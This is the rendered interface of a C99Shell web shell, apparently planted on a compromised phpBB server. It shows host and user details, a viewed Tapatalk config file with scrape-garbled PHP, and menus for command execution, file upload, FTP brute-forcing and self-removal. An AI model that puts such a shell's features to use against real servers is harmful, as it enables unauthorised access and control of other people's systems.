!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/mobiquo/config/   drwxrwxr-x
Free 83.33 GB of 96.73 GB (86.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     config.php (1.31 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
*
* @copyright (c) 2009 Quoord Systems Limited
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/

defined('IN_MOBIQUO') or exit;

function 
get_mobiquo_config() 
{
    
$config_file './config/config.txt';
    
file_exists($config_file) or exit('config.txt does not exists');
    
    if(
function_exists('file_get_contents')){
        
$tmp file_get_contents($config_file);
    }else{
        
$handle fopen($config_file'rb');
        
$tmp fread($handlefilesize($config_file));
        
fclose($handle);
    }
    
    
// remove comments by /*xxxx*/ or //xxxx
    
$tmp preg_replace('/\/\*.*?\*\/|\/\/.*?(\n)/si','$1',$tmp);
    
$tmpData preg_split("/\s*\n/"$tmp, -1PREG_SPLIT_NO_EMPTY);
    
    
$mobiquo_config = array();
    foreach (
$tmpData as $d){
        list(
$key$value) = preg_split("/=/"$d2); // value string may also have '='
        
$key trim($key);
        
$value trim($value);
        if (
$key == 'hide_forum_id')
        {
            
$value preg_split('/\s*,\s*/'$value, -1PREG_SPLIT_NO_EMPTY);
            
count($value) and $mobiquo_config[$key] = $value;
        }
        else
        {
            
strlen($value) and $mobiquo_config[$key] = $value;
        }
    }
    
    return 
$mobiquo_config;
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0057 ]--